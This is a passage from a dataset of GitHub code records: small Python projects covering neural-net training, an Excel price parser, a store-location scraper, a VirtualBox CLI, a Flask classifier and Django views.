1. initialization of weights\nI, H, O = 1, 10, 1\nW1 = Variable(0.01 * np.random.rand(I, H))\nb1 = Variable(np.zeros(H))\nW2 = Variable(0.01 * np.random.rand(H, O))\nb2 = Variable(np.zeros(O))\n\n# 2. prediction of neural networks\n\n\ndef predict(x):\n y = F.linear_simple(x, W1, b1)\n y = F.sigmoid_simple(y)\n y = F.linear_simple(y, W2, b2)\n return y\n\n\nlr = 0.2\niters = 10000\n\n# 3. training of neural networks\nfor i in range(iters):\n y_pred = predict(x)\n loss = F.mean_squared_error(y, y_pred)\n\n W1.cleargrad()\n b1.cleargrad()\n W2.cleargrad()\n b2.cleargrad()\n loss.backward()\n\n W1.data -= lr * W1.grad.data\n b1.data -= lr * b1.grad.data\n W2.data -= lr * W2.grad.data\n b2.data -= lr * b2.grad.data\n if i % 1000 == 0:\n print(loss)\n","repo_name":"dkasuga/dezero_framework","sub_path":"steps/step43.py","file_name":"step43.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23443319114","text":"# ----------------\n# version 0.6 для мвидео\n# ________________\nimport openpyxl\nfrom openpyxl import Workbook\nfrom settings import *\nimport datetime\nimport logical as lgp\n\n\nclass ParserFile:\n def __init__(self, path_to_open, path_to_save, db, mg, db_shop):\n self.mg = mg\n self.database = db\n self.path_to_open = path_to_open\n self.path_to_save = path_to_save\n\n self.price_db = {}\n # self.price_db_exit = {'Наименование': [], 'Цена': []}\n self.price_dict_exit = {}\n self.dict_price_entrance = {}\n\n self.db_new_price = {}\n self.db_update_price = {}\n self.db_shop = db_shop\n\n def open_file(self, file=None):\n \"\"\"\n Открываем файл\n вход артикул, цена, цена2, скидка, скидка2\n \"\"\"\n if file is None:\n file = self.path_to_open\n print('-- Открываем файл')\n wb = openpyxl.load_workbook(file) # открываем файл\n sheet = wb.active # Выбираем активный лист\n rows = sheet.max_row + 1 # cols = self.sheet.max_column\n cols = sheet.max_column + 1\n\n for row in range(1, rows):\n name = sheet.cell(row=row, column=1).value\n self.dict_price_entrance[name] = []\n for col in range(2, cols):\n self.dict_price_entrance[name].append(sheet.cell(row=row, column=col).value)\n\n def file_processing(self):\n \"\"\"\n Подготовака даннх к обработке\n \"\"\"\n print('-- Обрабатываем файл')\n if self.mg == 'mts.xlsx':\n 
self.price_dict_exit = lgp.logical_price_processing_mts(self.dict_price_entrance)\n elif self.mg == 'dns.xlsx':\n self.price_dict_exit = lgp.logical_price_processing_dns(self.dict_price_entrance)\n elif self.mg == 'mvideo1.xlsx':\n self.price_dict_exit = lgp.logical_price_processing_mvm(self.dict_price_entrance)\n\n self.price_dict_entrance = None\n\n def unloading_from_the_database(self):\n \"\"\"\n Выгружаем данные из базы даннхы\n \"\"\"\n print('-- Выгружаю данные из базы')\n with self.database.db:\n for data in self.db_shop.select():\n d = data\n self.price_db[d.name] = [d.price_old, d.price_new, d.date_recording, d.display]\n\n def find_in_the_database(self):\n \"\"\"\n Ищем позицию в базе, если находим - проверяем было ли\n изменнеие в цене. Если позиция не найдена то сохраняем\n в словарь для дальнейшей записи.\n \"\"\"\n db_p = self.price_db\n for key, value in self.price_dict_exit.items():\n price_new = int(value)\n if db_p.get(key):\n price_old = int(db_p[key][0])\n if price_old > price_new:\n self.db_update_price[key] = price_new\n else:\n self.db_new_price[key] = price_new\n\n def import_db(self):\n for name, price in self.dict_price_entrance.items():\n self.db_new_price[name] = price[0]\n\n def writing_database_price(self):\n \"\"\"\n Сохранение новых данных в базу\n \"\"\"\n if len(self.db_new_price.items()):\n print('-- Сохраняем новые данные в базу данных')\n dt_now = datetime.datetime.now()\n data = []\n for name, price in self.db_new_price.items():\n data.append(\n {'name': name, 'price_old': price, 'price_new': 0, 'date_recording': dt_now, 'display': 0, })\n\n with self.database.db.atomic():\n self.db_shop.insert_many(data).execute()\n\n def updating_database_price(self):\n \"\"\"\n Запись обработанных данных в базу. Обнавление цены\n \"\"\"\n if len(self.db_update_price):\n print('-- Обнавления данных')\n local_dict, local_list = {}, []\n for obj in self.database.PriceParser.select():\n local_dict[obj.name] = obj\n\n for name, price in self.db_update_price.items():\n local_dict[name].price_new = price\n local_dict[name].date_recording = datetime.datetime.now()\n local_list.append(local_dict[name])\n\n obj = self.database.PriceParser\n obj.bulk_update(local_list, fields=['price_new', 'date_recording'])\n\n def writing_file_excel(self):\n \"\"\"\n Сохраняем данные в формате excel(вместо базы данных)\n \"\"\"\n print('-- Сохраняем файл')\n wb = Workbook()\n ws = wb.active\n\n stop_for = len(self.price_dict_exit['Наименование'])\n for i in range(0, stop_for):\n ws.cell(row=i + 1, column=1, value=self.price_dict_exit['Наименование'][i])\n ws.cell(row=i + 1, column=2, value=self.price_dict_exit['Цена'][i])\n\n wb.save(filename=self.path_to_save)\n\n def writing_file_excel_db(self, path_to_save='database_excel.xlsx'):\n \"\"\"\n Сохраняем базу данных в формате excel\n \"\"\"\n wb = Workbook()\n ws = wb.active\n row = 1\n for key, value in self.price_db.items():\n ws.cell(row=row, column=1, value=key)\n columns = 2\n for i in value:\n ws.cell(row=row, column=columns, value=i)\n columns += 1\n row += 1\n wb.save(filename=path_to_save)\n\n def delete_db(self):\n self.database.PriceParser.drop_table()\n","repo_name":"dmitrilay/Price_list_handler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41487021415","text":"from BluetoothController import BluetoothController\n\n\ndef process_message(msg, lock):\n with lock:\n 
print(msg)\n\n\nUUID = \"1e0ca4ea-299d-4335-93eb-27fcfe7fa849\"\nbt_controller = BluetoothController(uuid=UUID)\nbt_controller.connect_and_listen(callback=process_message)","repo_name":"schulbe/vanCTRL","sub_path":"raspi/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31687211535","text":"import numpy as np\nfrom math import sqrt\n\ndef is_pos_def(x):\n return np.all(np.linalg.eigvals(x) > 0)\nsize=int(input(\"enter the size of matrix -->\"))\n\nmatrix=np.zeros((size,size))\n\nfor i in range (0,size):\n for j in range (0,size):\n print ('entry in row: ',i+1,' column: ',j+1)\n matrix[i][j] = int(input())\n \n\ndef cholesky(mtr,sze):\n\tmat=np.zeros((size,size))\n\tfor i in range(sze):\n\t\tfor j in range(i+1):\n\t\t\tsum_=0\n\t\t\tif j==i:\n\t\t\t\tfor k in range(j):\n\t\t\t\t\tsum_=sum_+(mat[j][k]**2)\n\t\t\t\tmat[j][j]= sqrt(mtr[j][j]-sum_)\n\t\t\telse:\n\t\t\t\tfor k in range(j):\n\t\t\t\t\tsum_=sum_+(mat[i][k] * mat[j][k])\n\t\t\t\tmat[i][j]=(mtr[i][j] - sum_)/mat[j][j]\n\treturn mat\nif is_pos_def(matrix):\n\tprint(\"lower triangular matrix is : \\n\")\n\tprint(cholesky(matrix,size))\n\tprint(\"tarnspose of lower triangular matrix is :\\n\")\n\tprint(cholesky(matrix,size).T)\t\t\t\t\t\t\t\nelse:\n\tprint(\"matrix is not positive defininte\\n\")\t","repo_name":"rangijayant15/Numerical_Analysis","sub_path":"cholesky.py","file_name":"cholesky.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31920698159","text":"from collections import defaultdict\nimport random\nfrom task import Task\nfrom solver import Solver\nimport numpy as np\n\n\nclass Grid(object):\n def __init__(self, env, params):\n self.env = env\n self.params = params\n # [x][y] = [object_type, smell, solver_smells]\n self.data = np.zeros((self.params.width, self.params.height, 3))\n self.tasks = {}\n self.solvers = []\n\n for _ in xrange(params.task_count):\n task = self.add_task()\n self.tasks[(task.x, task.y)] = task\n\n for _ in xrange(params.task_count / params.task_ratio):\n solver = self.add_solver()\n self.solvers.append(solver)\n\n def idle(self):\n while True:\n idle_time = random.randint(1, 10)\n yield self.env.timeout(idle_time)\n self.generate_task()\n\n def clear_task_at(self, x, y):\n self.task_at(x, y).clear()\n\n def task_at(self, x, y):\n return self.tasks[(x, y)]\n\n def generate_task(self):\n if random.random() < 0.5:\n self.add_task()\n\n def __find_empty_spot(self):\n x, y = None, None\n while True:\n x = random.randint(0, self.params.width - 1)\n y = random.randint(0, self.params.height - 1)\n if self.data[x, y, 0] == 0:\n break\n\n return (x, y)\n\n def add_task(self):\n x, y = self.__find_empty_spot()\n self.data[x, y, 0] = Task.id()\n return Task(self.env, x, y, self, self.params)\n\n def add_solver(self):\n x, y = self.__find_empty_spot()\n self.data[x, y, 0] = Solver.id()\n return Solver(self.env, x, y, self, self.params)\n","repo_name":"fanfilmu/agenty2016","sub_path":"tasksim/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74441377120","text":"from random import choice\r\nfrom math import sqrt\r\n\r\n# return number of cells around wall\r\ndef surroundingCells(maze, wall, cell_symbol):\r\n\tcounter = 0\r\n\tif 
(maze[wall[0]-1][wall[1]] == cell_symbol):\r\n\t\tcounter += 1\r\n\tif (maze[wall[0]+1][wall[1]] == cell_symbol):\r\n\t\tcounter += 1\r\n\tif (maze[wall[0]][wall[1]-1] == cell_symbol):\r\n\t\tcounter +=1\r\n\tif (maze[wall[0]][wall[1]+1] == cell_symbol):\r\n\t\tcounter += 1\r\n\treturn counter\r\n\r\n# make safe zone for player, guards must resp outside of the zone at start of level\r\ndef initial_guard_distance(player, guard):\r\n x = player[1] - guard[1]\r\n y = player[0] - guard[0]\r\n if (sqrt((x**2) + (y**2)) > 10):\r\n return True\r\n else: \r\n return False\r\n\r\n\r\n\r\n# convert maze to string and save to file\r\ndef save_generated_level(maze_list):\r\n\tstr_maze = \"\"\r\n\tfor line in maze_list:\r\n\t\tstr_maze += (''.join(line)) + '\\n'\r\n\r\n\twith open(\".\\content\\levels\\level_generated.txt\", 'w') as file:\r\n\t\tfile.write(str_maze[:-1])\r\n\r\n\r\ndef random_maze_generator(maze_size, guards, treasures):\r\n\t\r\n\theight=maze_size[0]\r\n\twidth=maze_size[1]\r\n\r\n\twall_symbol = 'X'\r\n\tcell_symbol = ' '\r\n\tunvisited_symbol = 'u'\r\n\r\n\tmaze, walls = [], []\r\n\r\n\t# mark all cells as unvisited\r\n\tfor i in range(0, height):\r\n\t\tline = []\r\n\t\tfor j in range(0, width):\r\n\t\t\tline.append(unvisited_symbol)\r\n\t\tmaze.append(line)\r\n\r\n\t# randomize initial point and set it a cell\r\n\tinitial_height = choice(range(1, height-2))\r\n\tinitial_width = choice(range(1, width-2))\r\n\tmaze[initial_height][initial_width] = cell_symbol\r\n\r\n\t# mark walls around initial cell \r\n\tmaze[initial_height-1][initial_width] = wall_symbol\r\n\tmaze[initial_height][initial_width - 1] = wall_symbol\r\n\tmaze[initial_height][initial_width + 1] = wall_symbol\r\n\tmaze[initial_height + 1][initial_width] = wall_symbol\r\n\r\n\t# add walls around initial cell to wall list\r\n\twalls.append([initial_height - 1, initial_width])\r\n\twalls.append([initial_height + 1, initial_width])\r\n\twalls.append([initial_height, initial_width - 1])\r\n\twalls.append([initial_height, initial_width + 1])\r\n\r\n\t# loop (building process of subsequent paths and walls)\r\n\twhile (walls):\r\n\t\twall = walls[(choice(range(0, len(walls))))]\r\n\r\n\t\t# check if chosen wall is not left border wall\r\n\t\tif (wall[1] != 0):\r\n\t\t\tif (maze[wall[0]][wall[1]-1] == unvisited_symbol and maze[wall[0]][wall[1]+1] == cell_symbol):\r\n\t\t\t\tif (surroundingCells(maze, wall, cell_symbol) < 2):\r\n\t\t\t\t\t# make new cell\r\n\t\t\t\t\tmaze[wall[0]][wall[1]] = cell_symbol\r\n\r\n\t\t\t\t\t# make wall on top cell\r\n\t\t\t\t\tif (wall[0] != 0):\r\n\t\t\t\t\t\tif (maze[wall[0]-1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]-1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]-1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]-1, wall[1]])\r\n\r\n\t\t\t\t\t# make wall on bottom cell\r\n\t\t\t\t\tif (wall[0] != height-1):\r\n\t\t\t\t\t\tif (maze[wall[0]+1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]+1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]+1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]+1, wall[1]])\r\n\r\n\t\t\t\t\t# make wall on left cell\r\n\t\t\t\t\tif (wall[1] != 0):\t\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]-1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]-1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]-1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]-1])\r\n\r\n\r\n\t\t# check if chosen wall is not top border wall\r\n\t\tif (wall[0] != 0):\r\n\t\t\tif (maze[wall[0]-1][wall[1]] == 
unvisited_symbol and maze[wall[0]+1][wall[1]] == cell_symbol):\r\n\t\t\t\tif (surroundingCells(maze, wall, cell_symbol) < 2):\r\n\t\t\t\t\t# make new cell\r\n\t\t\t\t\tmaze[wall[0]][wall[1]] = cell_symbol\r\n\r\n\t\t\t\t\t# make wall on top cell\r\n\t\t\t\t\tif (wall[0] != 0):\r\n\t\t\t\t\t\tif (maze[wall[0]-1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]-1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]-1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]-1, wall[1]])\r\n\r\n\t\t\t\t\t# make wall on left cell\r\n\t\t\t\t\tif (wall[1] != 0):\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]-1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]-1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]-1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]-1])\r\n\r\n\t\t\t\t\t# make wall on right cell\r\n\t\t\t\t\tif (wall[1] != width-1):\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]+1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]+1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]+1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]+1])\r\n\r\n\t\t# check if chosen wall is not bottom border wall\r\n\t\tif (wall[0] != height-1):\r\n\t\t\tif (maze[wall[0]+1][wall[1]] == unvisited_symbol and maze[wall[0]-1][wall[1]] == cell_symbol):\r\n\t\t\t\tif (surroundingCells(maze, wall, cell_symbol) < 2):\r\n\t\t\t\t\t# make new cell\r\n\t\t\t\t\tmaze[wall[0]][wall[1]] = cell_symbol\r\n\r\n\t\t\t\t\t# make wall on bottom cell\r\n\t\t\t\t\tif (wall[0] != height-1):\r\n\t\t\t\t\t\tif (maze[wall[0]+1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]+1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]+1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]+1, wall[1]])\r\n\r\n\t\t\t\t\t# make wall on left cell\r\n\t\t\t\t\tif (wall[1] != 0):\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]-1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]-1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]-1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]-1])\r\n\r\n\t\t\t\t\t# make wall on right cell\r\n\t\t\t\t\tif (wall[1] != width-1):\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]+1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]+1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]+1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]+1])\r\n\r\n\t\t# check if chosen wall is not right border wall\r\n\t\tif (wall[1] != width-1):\r\n\t\t\tif (maze[wall[0]][wall[1]+1] == unvisited_symbol and maze[wall[0]][wall[1]-1] == cell_symbol):\r\n\t\t\t\tif (surroundingCells(maze, wall, cell_symbol) < 2):\r\n\t\t\t\t\t# make new cell\r\n\t\t\t\t\tmaze[wall[0]][wall[1]] = cell_symbol\r\n\r\n\t\t\t\t\t# make wall on right cell\r\n\t\t\t\t\tif (wall[1] != width-1):\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]+1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]+1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]+1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]+1])\r\n\r\n\t\t\t\t\t# make wall on top cell\r\n\t\t\t\t\tif (wall[0] != 0):\t\r\n\t\t\t\t\t\tif (maze[wall[0]-1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]-1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]-1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]-1, wall[1]])\r\n\r\n\t\t\t\t\t# make wall on bottom cell\r\n\t\t\t\t\tif (wall[0] != height-1):\r\n\t\t\t\t\t\tif (maze[wall[0]+1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]+1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]+1, wall[1]] not in 
walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]+1, wall[1]])\r\n\r\n\t\t# remove wall from list of walls\r\n\t\tfor w in walls:\r\n\t\t\tif (w[0] == wall[0] and w[1] == wall[1]):\r\n\t\t\t\twalls.remove(w)\r\n\t\t\r\n\t# mark remaining unvisited cells as walls\r\n\tfor i in range(0, height):\r\n\t\tfor j in range(0, width):\r\n\t\t\tif (maze[i][j] == unvisited_symbol):\r\n\t\t\t\tmaze[i][j] = wall_symbol\r\n\r\n\t# mark player starting position\r\n\tfor i in range(0, width):\r\n\t\tif (maze[1][i] == cell_symbol):\r\n\t\t\tmaze[1][i] = 'P'\r\n\t\t\tplayer_position = [1, i]\r\n\t\t\tbreak\r\n\r\n\t# mark level exit position\r\n\tfor i in range(width-1, 0, -1):\r\n\t\tif (maze[height-2][i] == cell_symbol):\r\n\t\t\tmaze[height-2][i] = 'E'\r\n\t\t\tbreak\r\n\r\n\t# mark random positions of guards, outside of starting safe zone\r\n\tguard=0\r\n\twhile guard in range(guards):\r\n\t\ty = choice(range(1, height-2))\r\n\t\tx = choice(range(1, width-2))\r\n\t\tif (maze[y][x] != wall_symbol):\r\n\t\t\tguard_position = [y, x]\r\n\t\t\tif initial_guard_distance(player_position, guard_position):\r\n\t\t\t\tmaze[y][x] = 'G'\r\n\t\t\t\tguard += 1\r\n\r\n\t# mark random positions of treasures\r\n\ttreasure=0\r\n\twhile treasure in range(treasures):\r\n\t\ty = choice(range(1, height-2))\r\n\t\tx = choice(range(1, width-2))\r\n\t\tif (maze[y][x] != wall_symbol):\r\n\t\t\tif ((maze[y-1][x] or maze[y+1][x] or maze[y][x-1] or maze[y][x+1]) != 'G'):\r\n\t\t\t\tmaze[y][x] = 'T'\r\n\t\t\t\ttreasure += 1\r\n\r\n\tsave_generated_level(maze)","repo_name":"bxartur/Maze-game","sub_path":"content/modules/level_generator.py","file_name":"level_generator.py","file_ext":"py","file_size_in_byte":7675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"8300929761","text":"from typing import List\n\nfrom triple_agent.reports.generation.generic_query import query\nfrom triple_agent.classes.game import Game\nfrom triple_agent.reports.generation.plot_specs import (\n AxisProperties,\n DataQueryProperties,\n initialize_properties,\n)\n\n_NOSTOP = \"NoStop\"\n_STOP = \"Stop\"\n\n\nNOSTOP_PLOT_ORDER = [_NOSTOP, _STOP]\n\n\ndef _categorize_stop_talks(games, data_dictionary):\n # This is only checking whether a stop talk occured in a game\n # Not counting whether each start talk has a corresponding stop.\n for game in games:\n did_stop = None\n for timeline_event in game.timeline:\n if timeline_event.event == \"stopped talking.\":\n did_stop = True\n break\n\n if did_stop is None:\n data_dictionary[_NOSTOP] += 1\n else:\n data_dictionary[_STOP] += 1\n\n\ndef stop_talk_in_game_percentage(\n games: List[Game],\n data_query: DataQueryProperties = DataQueryProperties(),\n axis_properties: AxisProperties = AxisProperties(),\n): # pragma: no cover\n axis_properties, data_query = initialize_properties(\n axis_properties,\n data_query,\n AxisProperties(\n primary_color_dict={\n _NOSTOP: axis_properties.plot_colors.color_1,\n _STOP: axis_properties.plot_colors.color_2,\n }\n ),\n DataQueryProperties(\n query_function=_categorize_stop_talks, primary_order=NOSTOP_PLOT_ORDER\n ),\n )\n\n return query(games, data_query, axis_properties)\n","repo_name":"andrewzwicky/TripleAgent","sub_path":"triple_agent/reports/specific/stop_talks.py","file_name":"stop_talks.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"28847031399","text":"import pandas as pd\nimport pickle\nimport 
warnings\nwarnings.filterwarnings('ignore')\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\n\nfrom flask import Flask\nfrom flask import render_template, request, jsonify\n\nmodel_file_name = \"complaints_classifier.pkl\"\nmodel_path = \"../models/\"+model_file_name\n\napp = Flask(__name__)\n\n\ndef tokenize(text):\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n\n# load model\nprint(\"loading model {} ...\".format(model_path))\nmodel = pickle.load(open(model_path, 'rb'))\n\n\n# index webpage receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n # create the dictionary of Topic names and Topics\n topic_names = {0: \"Bank account services\",\n 1: \"Credit card / Prepaid card\",\n 2: \"Others\",\n 3: \"Theft/Dispute reporting\",\n 4: \"Mortgages/loans\"}\n\n # save user input in query\n query = request.args.get('query', '')\n\n # use model to predict classification for query\n print(\"generating classification prediction for message {}...\".format(query))\n classification_labels = model.predict([query])[0]\n classification_labels = topic_names[classification_labels]\n print(\"labels {}...\".format(classification_labels))\n # classification_results = dict(zip(df.columns[4:], classification_labels))\n\n # This will render the index.html Please see that file.\n return render_template(\n 'index.html',\n query=query,\n model=model[-1],\n classification_labels=classification_labels\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=8000, debug=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"fayolapeters/complaints","sub_path":"app/complaints.py","file_name":"complaints.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13969792850","text":"import csv\nimport re\n\nimport requests\nfrom data import data \n\ndef get_nearest_facilities(latitude, longitude, access_token, types, limit=3):\n base_url = \"https://api.mapbox.com/geocoding/v5/mapbox.places/\"\n coordinates = f\"{longitude},{latitude}.json\"\n endpoint = f\"{base_url}{coordinates}\"\n params = {\n \"access_token\": access_token,\n \"types\": types, \n \"limit\": limit\n }\n\n response = requests.get(endpoint, params=params)\n data = response.json()\n\n if response.status_code == 200:\n features = data.get(\"features\", [])\n results = []\n count = 0 \n for feature in features:\n place_name = feature.get(\"place_name\", \"\")\n \n if 'mix' not in place_name.lower():\n first_part = place_name.split(',')[0]\n results.append(first_part)\n count+=1\n print(\"placename \",count ,\" : \" , place_name )\n if count < 2 :\n results.append(\"newplace\")\n return results\n\n else:\n print(f\"Error: {response.status_code}, {data.get('message', 'Unknown error')}\")\n\n\n\nwith open('data_familymart.csv', 'w', newline='', encoding='utf-8') as csvfile:\n csv_writer = csv.writer(csvfile)\n\n csv_writer.writerow(['feature_name','feature_tag','Name','Address', 'Latitude','Longitude','Location','Nearest(poi)'])\n x=0\n for item in data:\n content = item['content']\n\n name_start = content.find('
') + 4\n name_end = content.find('<', name_start)\n name = content[name_start:name_end].strip()\n\n address_start = content.find('

') + 18\n address_end = content.find('

', address_start)\n full_address = content[address_start:address_end].replace('
', ' ').strip()\n\n # getlocation name\n\n\n # Check if the address contains \"Selangor\"\n if full_address:\n # if 'Selangor' in full_address:\n pattern = r'(?:.*?,){3}\\s*([^,]+)$'\n match = re.search(pattern, full_address)\n\n if match:\n result = match.group()\n city = [part.strip() for part in result.split(',')]\n x = len(city) - 2\n\n # print(city[x-1])\n lat = item['position']['lat']\n lng = item['position']['lng']\n\n mapbox_access_token = \"pk.eyJ1IjoicnllaSIsImEiOiJjbG52aHo5aWgwcGs3MnBucDBwd2Jud2VkIn0.yFjj-Nk5rVdbkGtIaBF84Q\"\n facility_types = \"poi,poi.landmark\" \n \n nearestpoi = get_nearest_facilities(lat, lng, mapbox_access_token, facility_types)\n\n state = city[len(city)-1]\n if ' ' in state :\n # print(state)\n newState = state.split()[-2]\n print(newState)\n \n\n csv_writer.writerow([\"familymart\",\"convenience_store\",f\"{name} @{city[x-1]}\", full_address, f\"{lat}\",f\"{lng}\",city[x-1],nearestpoi])\n x=x+1\n print(\"Total: \",x)\n","repo_name":"tuxuri/data-collection","sub_path":"webscrape-training-code/familymart/fmscraping.py","file_name":"fmscraping.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16181066996","text":"import virtualbox\r\nimport sys\r\n\r\nmessage = \"Create | Delete | Open | Close | Exit | Help \"\r\nprint(\"CLI is running\")\r\nprint(\"Please, select and type below your wanted option...\")\r\nprint(message)\r\n\r\n\r\ndef cli_action():\r\n\r\n vbox = virtualbox.VirtualBox()\r\n machines = vbox.machines\r\n\r\n command = input(\">: \")\r\n\r\n if command == \"Open\":\r\n print(\"Choose and type below on of the following existing machines...\")\r\n for machine in machines:\r\n print(machine.name)\r\n sel_machine = input(\">: \")\r\n print(sel_machine + \" is opening\")\r\n session = virtualbox.Session()\r\n machine = vbox.find_machine(sel_machine)\r\n # progress = machine.launch_vm_process(session, \"gui\", \"\")\r\n # For virtualbox API 6_1 and above (VirtualBox 6.1.2+), use the following:\r\n progress = machine.launch_vm_process(session, \"headless\", [])\r\n progress.wait_for_completion()\r\n print(sel_machine + \" is running... 
To close it, type y below \")\r\n command = input(\">: \")\r\n if command == \"y\":\r\n session.console.power_down()\r\n\r\n elif command == \"Create\":\r\n print(\"Choose below an OS to clone...\")\r\n for machine in machines:\r\n print(machine.name)\r\n sel_machine = input(\">: \")\r\n print(\"Choose a name for the new machine...\")\r\n sel_name = input(\">: \")\r\n print(sel_machine + \" is creating...\")\r\n machine_to_clone = vbox.find_machine(sel_machine)\r\n # session = virtualbox.Session()\r\n # progress = machine.launch_vm_process(session, \"gui\", [])\r\n # progress.wait_for_completion()\r\n # session.machine.take_snapshot(name=\"snapshot1\",description=\"For study matters\", pause=False)\r\n machine_to_clone.clone(name=sel_name)\r\n print(sel_name + \" is created!\")\r\n\r\n elif command == \"Delete\":\r\n print(\"Choose below an OS to remove...\")\r\n for machine in machines:\r\n print(machine.name)\r\n sel_machine = input(\">: \")\r\n print(sel_machine + \" is being deleted...\")\r\n machine_to_delete = vbox.find_machine(sel_machine)\r\n # session = virtualbox.Session()\r\n # progress = machine.launch_vm_process(session, \"gui\", [])\r\n # progress.wait_for_completion()\r\n # session.machine.take_snapshot(name=\"snapshot1\",description=\"For study matters\", pause=False)\r\n machine_to_delete.remove(delete=True)\r\n print(sel_machine + \" has been deleted...\")\r\n\r\n elif command == \"Exit\":\r\n sys.exit()\r\n\r\n elif command == \"Help\":\r\n print(\"Please, select and type below your wanted option...\")\r\n print(message)\r\n\r\n else:\r\n print(\"Oops! It seems like your input isn't valid! Please, enter it again!\")\r\n\r\n\r\nwhile True:\r\n try:\r\n cli_action()\r\n except:\r\n print('Oops... It looks that something goes wrong!')\r\n print('Please, note that commands and vm are case sensitive')\r\n print('For more info, type Help on command line')\r\n cli_action()\r\n","repo_name":"mariachi9999/virtualbox-CLI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72979197601","text":"from django.shortcuts import render, redirect\nimport json\nfrom django.http import JsonResponse\n\nfrom .models import Post, Comment\n\ndef postList(request,by):\n if by == \"all\":\n post_list = Post.objects.all().order_by(\"-created_at\")\n context = {\n \"post_list\" : post_list,\n }\n elif by == \"follow\":\n followings = request.user.followings.all()\n post_list = Post.objects.filter(author__in = followings).order_by(\"-created_at\")\n context = {\n \"post_list\" : post_list,\n }\n return render(request,\"main.html\",context)\n\ndef postDetail(request,id):\n post = Post.objects.get(id = id)\n context = {\n \"post\": post,\n }\n return render(request,\"content/content.html\",context)\n\ndef postSaved(request):\n post_list = request.user.saved_posts.all()\n context = {\n \"post_list\" : post_list,\n }\n return render(request,\"content/bucket.html\",context)\n\n\ndef postCreate(request):\n if request.method == \"POST\":\n post = Post(author = request.user,content 